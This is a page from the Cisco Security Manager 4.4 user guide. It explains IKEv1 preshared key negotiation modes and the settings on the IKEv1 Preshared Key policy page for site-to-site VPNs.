25-44
User Guide for Cisco Security Manager 4.4
OL-28826-01
Chapter 25 Configuring IKE and IPsec Policies
Understanding IKEv1 Preshared Key Policies in Site-to-Site VPNs
Note If you are configuring DMVPN with direct spoke-to-spoke connectivity, you create a
wildcard key on the spokes.
Main mode fully qualified domain name (FQDN)—Negotiation is based on DNS resolution, with
no reliance on IP address. This option can only be used if the DNS resolution service is available
for the host. It is useful when managing devices with dynamic IP addresses that have DNS resolution
capabilities.
Aggressive mode—Negotiation is based on hostname (without DNS resolution) and domain name.
Aggressive mode is less secure than main mode. However, it provides more security than using
group preshared keys if the IP address of the VPN interface on the host is unknown, and the FQDN
of the dynamic IP peer is not DNS resolvable. This negotiation method is recommended for use with
a GRE Dynamic IP or DMVPN failover and routing policy.
Related Topics
Deciding Which Authentication Method to Use, page 25-8
Configuring IKEv1 Preshared Key Policies, page 25-44
Configuring IKEv1 Preshared Key Policies
Use the IKEv1 Preshared Key page to define the preshared key configuration when using IKEv1 in a
site-to-site VPN topology. For information on configuring preshared keys when using IKEv2, see
Configuring IKEv2 Authentication in Site-to-Site VPNs, page 25-62.
Note The preshared key policy does not apply to Easy VPN topologies.
To open the IKEv1 Preshared Key page:
(Site-to-Site VPN Manager Window, page 24-18) Select a topology in the VPNs selector, then select
IKEv1 Preshared Key in the Policies selector.
(Policy view) Select Site-to-Site VPN > IKEv1 Preshared Key from the Policy Types selector.
Select an existing shared policy or create a new one.
The following table explains the settings you can configure in this policy.
Table25-9 IKEv1 Preshared Key Page
Element Description
Key Specification
Select whether to manually define the key (User Defined) or to have the key automatically generated.
There are additional options you can configure when using auto generated keys.
User Defined When selected, enables you to use a manually defined preshared key.
Enter the required preshared key in the Key field, then enter it again in
the Confirm field.